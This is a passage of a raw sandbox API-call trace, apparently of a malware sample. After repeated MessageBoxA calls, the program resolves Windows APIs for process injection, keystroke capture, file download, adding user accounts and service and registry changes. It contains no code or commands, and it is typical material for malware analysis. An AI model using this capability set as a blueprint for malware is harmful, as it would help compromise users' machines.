-99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.510] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.511] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.512] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.512] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.512] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.512] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.512] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.512] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.512] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0285.512] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0287.520] GetNativeSystemInfo (in: lpSystemInfo=0x19fe64 | out: lpSystemInfo=0x19fe64*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0287.521] VirtualAlloc (lpAddress=0x0, dwSize=0x154000, flAllocationType=0x3000, flProtect=0x4) returned 0x2bf0000 [0287.525] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x74130000 [0287.553] GetProcAddress (hModule=0x74130000, lpProcName="BCryptSetProperty") returned 0x741347e0 [0287.553] GetProcAddress (hModule=0x74130000, lpProcName="BCryptGenerateSymmetricKey") returned 0x74134910 [0287.553] GetProcAddress (hModule=0x74130000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x74133760 [0287.553] GetProcAddress (hModule=0x74130000, lpProcName="BCryptDecrypt") returned 0x74134ff0 [0287.553] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x74c90000 [0287.554] GetProcAddress (hModule=0x74c90000, lpProcName="HeapFree") returned 0x74ca1ba0 [0287.554] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualAlloc") returned 0x74ca7810 [0287.554] GetProcAddress (hModule=0x74c90000, lpProcName="HeapReAlloc") returned 0x7778efe0 [0287.554] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualQuery") returned 0x74ca7a90 [0287.554] GetProcAddress (hModule=0x74c90000, lpProcName="TerminateThread") returned 0x74cb0160 [0287.554] GetProcAddress (hModule=0x74c90000, lpProcName="CreateThread") returned 0x74ca9b90 [0287.554] GetProcAddress (hModule=0x74c90000, lpProcName="WriteProcessMemory") returned 0x74cd2850 [0287.555] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentProcess") returned 0x74ca38c0 [0287.555] GetProcAddress (hModule=0x74c90000, lpProcName="OpenProcess") returned 0x74ca8bf0 [0287.555] GetProcAddress (hModule=0x74c90000, lpProcName="GetWindowsDirectoryA") returned 0x74cab060 [0287.555] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualProtectEx") returned 0x74cd2790 [0287.555] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualAllocEx") returned 0x74cd2730 [0287.555] GetProcAddress (hModule=0x74c90000, lpProcName="CreateRemoteThread") returned 0x74cd07f0 [0287.555] GetProcAddress (hModule=0x74c90000, lpProcName="CreateProcessA") returned 0x74cd0750 [0287.556] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleHandleW") returned 0x74ca9bc0 [0287.556] GetProcAddress (hModule=0x74c90000, lpProcName="IsWow64Process") returned 0x74ca9f10 [0287.556] GetProcAddress (hModule=0x74c90000, lpProcName="WriteFile") returned 0x74cb6ca0 [0287.556] GetProcAddress (hModule=0x74c90000, lpProcName="CreateFileW") returned 0x74cb6890 [0287.556] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryW") returned 0x74caa840 [0287.556] GetProcAddress (hModule=0x74c90000, lpProcName="GetLocalTime") returned 0x74ca9be0 [0287.556] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentThreadId") returned 0x74ca1b90 [0287.557] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentProcessId") returned 0x74ca23e0 [0287.557] GetProcAddress (hModule=0x74c90000, lpProcName="ReadFile") returned 0x74cb6bb0 [0287.557] GetProcAddress (hModule=0x74c90000, lpProcName="FindFirstFileA") returned 0x74cb6920 [0287.557] GetProcAddress (hModule=0x74c90000, lpProcName="GetBinaryTypeW") returned 0x74cd7820 [0287.557] GetProcAddress (hModule=0x74c90000, lpProcName="FindNextFileA") returned 0x74cb6980 [0287.557] GetProcAddress (hModule=0x74c90000, lpProcName="GetFullPathNameA") returned 0x74cb6ad0 [0287.557] GetProcAddress (hModule=0x74c90000, lpProcName="GetTempPathW") returned 0x74cb6b30 [0287.558] GetProcAddress (hModule=0x74c90000, lpProcName="GetPrivateProfileStringW") returned 0x74cb09a0 [0287.558] GetProcAddress (hModule=0x74c90000, lpProcName="CreateFileA") returned 0x74cb6880 [0287.558] GetProcAddress (hModule=0x74c90000, lpProcName="GlobalAlloc") returned 0x74ca9950 [0287.558] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentDirectoryW") returned 0x74caa9a0 [0287.558] GetProcAddress (hModule=0x74c90000, lpProcName="SetCurrentDirectoryW") returned 0x74cafb20 [0287.558] GetProcAddress (hModule=0x74c90000, lpProcName="GetFileSize") returned 0x74cb6a70 [0287.558] GetProcAddress (hModule=0x74c90000, lpProcName="FreeLibrary") returned 0x74ca9f50 [0287.559] GetProcAddress (hModule=0x74c90000, lpProcName="SetDllDirectoryW") returned 0x74cb5070 [0287.559] GetProcAddress (hModule=0x74c90000, lpProcName="GetFileSizeEx") returned 0x74cb6a80 [0287.559] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryA") returned 0x74cb4bf0 [0287.559] GetProcAddress (hModule=0x74c90000, lpProcName="LocalFree") returned 0x74ca79a0 [0287.559] GetProcAddress (hModule=0x74c90000, lpProcName="WaitForSingleObject") returned 0x74cb6820 [0287.559] GetProcAddress (hModule=0x74c90000, lpProcName="WaitForMultipleObjects") returned 0x74cb6800 [0287.559] GetProcAddress (hModule=0x74c90000, lpProcName="CreatePipe") returned 0x74ca0540 [0287.560] GetProcAddress (hModule=0x74c90000, lpProcName="PeekNamedPipe") returned 0x74cd19b0 [0287.560] GetProcAddress (hModule=0x74c90000, lpProcName="DuplicateHandle") returned 0x74cb6640 [0287.560] GetProcAddress (hModule=0x74c90000, lpProcName="SetEvent") returned 0x74cb67d0 [0287.560] GetProcAddress (hModule=0x74c90000, lpProcName="GetStartupInfoA") returned 0x74ca9c10 [0287.560] GetProcAddress (hModule=0x74c90000, lpProcName="CreateEventA") returned 0x74cb6680 [0287.560] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleFileNameW") returned 0x74ca9b00 [0287.560] GetProcAddress (hModule=0x74c90000, lpProcName="LoadResource") returned 0x74ca76f0 [0287.561] GetProcAddress (hModule=0x74c90000, lpProcName="FindResourceW") returned 0x74cb2a40 [0287.561] GetProcAddress (hModule=0x74c90000, lpProcName="GetComputerNameW") returned 0x74cb46a0 [0287.561] GetProcAddress (hModule=0x74c90000, lpProcName="GlobalMemoryStatusEx") returned 0x74caafe0 [0287.561] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryExW") returned 0x74ca7930 [0287.567] GetProcAddress (hModule=0x74c90000, lpProcName="FindFirstFileW") returned 0x74cb6960 [0287.567] GetProcAddress (hModule=0x74c90000, lpProcName="FindNextFileW") returned 0x74cb69a0 [0287.567] GetProcAddress (hModule=0x74c90000, lpProcName="SetFilePointer") returned 0x74cb6c40 [0287.568] GetProcAddress (hModule=0x74c90000, lpProcName="GetLogicalDriveStringsW") returned 0x74cb6af0 [0287.568] GetProcAddress (hModule=0x74c90000, lpProcName="DeleteFileW") returned 0x74cb68c0 [0287.568] GetProcAddress (hModule=0x74c90000, lpProcName="CopyFileW") returned 0x74cb6ec0 [0287.568] GetProcAddress (hModule=0x74c90000, lpProcName="GetDriveTypeW") returned 0x74cb6a10 [0287.568] GetProcAddress (hModule=0x74c90000, lpProcName="EnterCriticalSection") returned 0x7779f290 [0287.568] GetProcAddress (hModule=0x74c90000, lpProcName="LeaveCriticalSection") returned 0x7779f210 [0287.568] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeCriticalSection") returned 0x777ba200 [0287.569] GetProcAddress (hModule=0x74c90000, lpProcName="DeleteCriticalSection") returned 0x777b0e60 [0287.569] GetProcAddress (hModule=0x74c90000, lpProcName="GetProcessHeap") returned 0x74ca7710 [0287.569] GetProcAddress (hModule=0x74c90000, lpProcName="ReleaseMutex") returned 0x74cb67a0 [0287.569] GetProcAddress (hModule=0x74c90000, lpProcName="TerminateProcess") returned 0x74cb5100 [0287.569] GetProcAddress (hModule=0x74c90000, lpProcName="CreateToolhelp32Snapshot") returned 0x74cb7b50 [0287.569] GetProcAddress (hModule=0x74c90000, lpProcName="Process32NextW") returned 0x74cad290 [0287.569] GetProcAddress (hModule=0x74c90000, lpProcName="Process32FirstW") returned 0x74caf5a0 [0287.570] GetProcAddress (hModule=0x74c90000, lpProcName="SizeofResource") returned 0x74ca8f80 [0287.570] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualProtect") returned 0x74ca7a50 [0287.570] GetProcAddress (hModule=0x74c90000, lpProcName="GetSystemDirectoryW") returned 0x74ca9fd0 [0287.570] GetProcAddress (hModule=0x74c90000, lpProcName="LockResource") returned 0x74ca7890 [0287.570] GetProcAddress (hModule=0x74c90000, lpProcName="GetWindowsDirectoryW") returned 0x74cb5120 [0287.570] GetProcAddress (hModule=0x74c90000, lpProcName="Process32First") returned 0x74caf4d0 [0287.570] GetProcAddress (hModule=0x74c90000, lpProcName="Process32Next") returned 0x74cad1c0 [0287.571] GetProcAddress (hModule=0x74c90000, lpProcName="WinExec") returned 0x74ccff70 [0287.571] GetProcAddress (hModule=0x74c90000, lpProcName="GetTempPathA") returned 0x74cb6b20 [0287.571] GetProcAddress (hModule=0x74c90000, lpProcName="HeapAlloc") returned 0x77792bd0 [0287.571] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcmpW") returned 0x74ca7970 [0287.571] GetProcAddress (hModule=0x74c90000, lpProcName="GetTickCount") returned 0x74cb5eb0 [0287.571] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcpyW") returned 0x74ccd260 [0287.571] GetProcAddress (hModule=0x74c90000, lpProcName="WideCharToMultiByte") returned 0x74ca3880 [0287.571] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcpyA") returned 0x74caea30 [0287.572] GetProcAddress (hModule=0x74c90000, lpProcName="Sleep") returned 0x74ca7990 [0287.572] GetProcAddress (hModule=0x74c90000, lpProcName="MultiByteToWideChar") returned 0x74ca2ad0 [0287.572] GetProcAddress (hModule=0x74c90000, lpProcName="GetCommandLineA") returned 0x74caab60 [0287.572] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleHandleA") returned 0x74ca99f0 [0287.572] GetProcAddress (hModule=0x74c90000, lpProcName="ExitProcess") returned 0x74cb7b30 [0287.572] GetProcAddress (hModule=0x74c90000, lpProcName="CreateProcessW") returned 0x74cab000 [0287.572] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcatA") returned 0x74caf640 [0287.573] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcmpA") returned 0x74cacc30 [0287.573] GetProcAddress (hModule=0x74c90000, lpProcName="lstrlenA") returned 0x74ca8c80 [0287.573] GetProcAddress (hModule=0x74c90000, lpProcName="ExpandEnvironmentStringsW") returned 0x74cacd50 [0287.573] GetProcAddress (hModule=0x74c90000, lpProcName="lstrlenW") returned 0x74ca3690 [0287.573] GetProcAddress (hModule=0x74c90000, lpProcName="CloseHandle") returned 0x74cb6630 [0287.573] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcatW") returned 0x74ccd170 [0287.573] GetProcAddress (hModule=0x74c90000, lpProcName="GetLastError") returned 0x74ca3870 [0287.574] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualFree") returned 0x74ca7600 [0287.574] GetProcAddress (hModule=0x74c90000, lpProcName="GetProcAddress") returned 0x74ca78b0 [0287.574] GetProcAddress (hModule=0x74c90000, lpProcName="SetLastError") returned 0x74ca2af0 [0287.574] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleFileNameA") returned 0x74caa720 [0287.574] GetProcAddress (hModule=0x74c90000, lpProcName="CreateDirectoryW") returned 0x74cb6860 [0287.574] GetProcAddress (hModule=0x74c90000, lpProcName="LocalAlloc") returned 0x74ca7a30 [0287.574] GetProcAddress (hModule=0x74c90000, lpProcName="CreateMutexA") returned 0x74cb66c0 [0287.574] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x756d0000 [0287.575] GetProcAddress (hModule=0x756d0000, lpProcName="GetKeyState") returned 0x756eddd0 [0287.575] GetProcAddress (hModule=0x756d0000, lpProcName="GetMessageA") returned 0x756fe130 [0287.575] GetProcAddress (hModule=0x756d0000, lpProcName="DispatchMessageA") returned 0x75706f10 [0287.575] GetProcAddress (hModule=0x756d0000, lpProcName="CreateWindowExW") returned 0x756e9860 [0287.575] GetProcAddress (hModule=0x756d0000, lpProcName="CallNextHookEx") returned 0x756e3550 [0287.575] GetProcAddress (hModule=0x756d0000, lpProcName="GetAsyncKeyState") returned 0x756ee820 [0287.584] GetProcAddress (hModule=0x756d0000, lpProcName="RegisterClassW") returned 0x756e9800 [0287.587] GetProcAddress (hModule=0x756d0000, lpProcName="GetRawInputData") returned 0x7570c3f0 [0287.587] GetProcAddress (hModule=0x756d0000, lpProcName="MapVirtualKeyA") returned 0x75703e20 [0287.587] GetProcAddress (hModule=0x756d0000, lpProcName="DefWindowProcA") returned 0x777eaed0 [0287.587] GetProcAddress (hModule=0x756d0000, lpProcName="RegisterRawInputDevices") returned 0x7570c950 [0287.588] GetProcAddress (hModule=0x756d0000, lpProcName="TranslateMessage") returned 0x756ed9b0 [0287.588] GetProcAddress (hModule=0x756d0000, lpProcName="GetForegroundWindow") returned 0x75708cb0 [0287.588] GetProcAddress (hModule=0x756d0000, lpProcName="GetKeyNameTextW") returned 0x75738f40 [0287.588] GetProcAddress (hModule=0x756d0000, lpProcName="PostQuitMessage") returned 0x757072f0 [0287.588] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0287.588] GetProcAddress (hModule=0x756d0000, lpProcName="GetLastInputInfo") returned 0x756fe100 [0287.588] GetProcAddress (hModule=0x756d0000, lpProcName="wsprintfW") returned 0x756ff890 [0287.589] GetProcAddress (hModule=0x756d0000, lpProcName="GetWindowTextW") returned 0x756fcb20 [0287.589] GetProcAddress (hModule=0x756d0000, lpProcName="wsprintfA") returned 0x757004a0 [0287.589] GetProcAddress (hModule=0x756d0000, lpProcName="ToUnicode") returned 0x757047d0 [0287.589] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x75830000 [0287.589] GetProcAddress (hModule=0x75830000, lpProcName="RegDeleteKeyW") returned 0x758504f0 [0287.589] GetProcAddress (hModule=0x75830000, lpProcName="RegCreateKeyExW") returned 0x7584fa20 [0287.589] GetProcAddress (hModule=0x75830000, lpProcName="RegSetValueExA") returned 0x75850a20 [0287.590] GetProcAddress (hModule=0x75830000, lpProcName="RegDeleteValueW") returned 0x75850fb0 [0287.590] GetProcAddress (hModule=0x75830000, lpProcName="LookupPrivilegeValueW") returned 0x7584e430 [0287.590] GetProcAddress (hModule=0x75830000, lpProcName="AdjustTokenPrivileges") returned 0x75850980 [0287.590] GetProcAddress (hModule=0x75830000, lpProcName="AllocateAndInitializeSid") returned 0x7584f660 [0287.590] GetProcAddress (hModule=0x75830000, lpProcName="OpenProcessToken") returned 0x7584f520 [0287.590] GetProcAddress (hModule=0x75830000, lpProcName="InitializeSecurityDescriptor") returned 0x7584fc00 [0287.590] GetProcAddress (hModule=0x75830000, lpProcName="RegDeleteKeyA") returned 0x758504a0 [0287.591] GetProcAddress (hModule=0x75830000, lpProcName="SetSecurityDescriptorDacl") returned 0x7584f830 [0287.591] GetProcAddress (hModule=0x75830000, lpProcName="RegOpenKeyExW") returned 0x7584f350 [0287.591] GetProcAddress (hModule=0x75830000, lpProcName="RegOpenKeyExA") returned 0x7584f790 [0287.591] GetProcAddress (hModule=0x75830000, lpProcName="RegEnumKeyExW") returned 0x7584f470 [0287.591] GetProcAddress (hModule=0x75830000, lpProcName="RegQueryValueExA") returned 0x7584f500 [0287.591] GetProcAddress (hModule=0x75830000, lpProcName="RegQueryInfoKeyW") returned 0x7584f640 [0287.599] GetProcAddress (hModule=0x75830000, lpProcName="RegCloseKey") returned 0x7584f620 [0287.599] GetProcAddress (hModule=0x75830000, lpProcName="OpenServiceW") returned 0x75850690 [0287.599] GetProcAddress (hModule=0x75830000, lpProcName="ChangeServiceConfigW") returned 0x758664b0 [0287.599] GetProcAddress (hModule=0x75830000, lpProcName="QueryServiceConfigW") returned 0x758505b0 [0287.599] GetProcAddress (hModule=0x75830000, lpProcName="EnumServicesStatusExW") returned 0x75850610 [0287.600] GetProcAddress (hModule=0x75830000, lpProcName="StartServiceW") returned 0x75854210 [0287.600] GetProcAddress (hModule=0x75830000, lpProcName="RegSetValueExW") returned 0x7584f7f0 [0287.600] GetProcAddress (hModule=0x75830000, lpProcName="RegCreateKeyExA") returned 0x7584fa60 [0287.600] GetProcAddress (hModule=0x75830000, lpProcName="OpenSCManagerW") returned 0x75850ed0 [0287.600] GetProcAddress (hModule=0x75830000, lpProcName="CloseServiceHandle") returned 0x75850960 [0287.600] GetProcAddress (hModule=0x75830000, lpProcName="GetTokenInformation") returned 0x7584f370 [0287.600] GetProcAddress (hModule=0x75830000, lpProcName="LookupAccountSidW") returned 0x7584f590 [0287.601] GetProcAddress (hModule=0x75830000, lpProcName="FreeSid") returned 0x75850440 [0287.601] GetProcAddress (hModule=0x75830000, lpProcName="RegQueryValueExW") returned 0x7584f330 [0287.601] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75c70000 [0287.601] GetProcAddress (hModule=0x75c70000, lpProcName="ShellExecuteExA") returned 0x75ee0290 [0287.601] GetProcAddress (hModule=0x75c70000, lpProcName="ShellExecuteExW") returned 0x75e0e690 [0287.601] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetSpecialFolderPathW") returned 0x75e1f9c0 [0287.604] GetProcAddress (hModule=0x75c70000, lpProcName="SHCreateDirectoryExW") returned 0x75e20490 [0287.604] GetProcAddress (hModule=0x75c70000, lpProcName="ShellExecuteW") returned 0x75e0d9f0 [0287.605] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetFolderPathW") returned 0x75e14e80 [0287.605] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetKnownFolderPath") returned 0x75e19710 [0287.605] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x71e40000 [0287.657] GetProcAddress (hModule=0x71e40000, lpProcName="URLDownloadToFileW") returned 0x71ebb240 [0287.657] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75520000 [0287.660] GetProcAddress (hModule=0x75520000, lpProcName="InetNtopW") returned 0x7554bd80 [0287.661] GetProcAddress (hModule=0x75520000, lpProcName="getaddrinfo") returned 0x755355c0 [0287.661] GetProcAddress (hModule=0x75520000, lpProcName="freeaddrinfo") returned 0x75535ee0 [0287.661] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x77660000 [0287.661] GetProcAddress (hModule=0x77660000, lpProcName="CoInitializeSecurity") returned 0x77543870 [0287.661] GetProcAddress (hModule=0x77660000, lpProcName="CoCreateInstance") returned 0x77500060 [0287.661] GetProcAddress (hModule=0x77660000, lpProcName="CoInitialize") returned 0x77691930 [0287.661] GetProcAddress (hModule=0x77660000, lpProcName="CoUninitialize") returned 0x774d92a0 [0287.661] GetProcAddress (hModule=0x77660000, lpProcName="CoTaskMemFree") returned 0x774d9170 [0287.661] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x74860000 [0287.661] GetProcAddress (hModule=0x74860000, lpProcName="StrStrW") returned 0x74878540 [0287.661] GetProcAddress (hModule=0x74860000, lpProcName="PathRemoveFileSpecA") returned 0x74882d80 [0287.662] GetProcAddress (hModule=0x74860000, lpProcName="StrStrA") returned 0x74883570 [0287.662] GetProcAddress (hModule=0x74860000, lpProcName="PathCombineA") returned 0x748828e0 [0287.662] GetProcAddress (hModule=0x74860000, lpProcName="PathFindFileNameW") returned 0x74877a50 [0287.662] GetProcAddress (hModule=0x74860000, lpProcName="PathFileExistsW") returned 0x74878670 [0287.662] GetProcAddress (hModule=0x74860000, lpProcName="PathFindExtensionW") returned 0x74877960 [0287.662] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x77640000 [0287.664] GetProcAddress (hModule=0x77640000, lpProcName="NetLocalGroupAddMembers") returned 0x71e282b0 [0287.667] GetProcAddress (hModule=0x77640000, lpProcName="NetUserAdd") returned 0x71e2ba50 [0287.667] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x755e0000 [0287.667] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x74690000 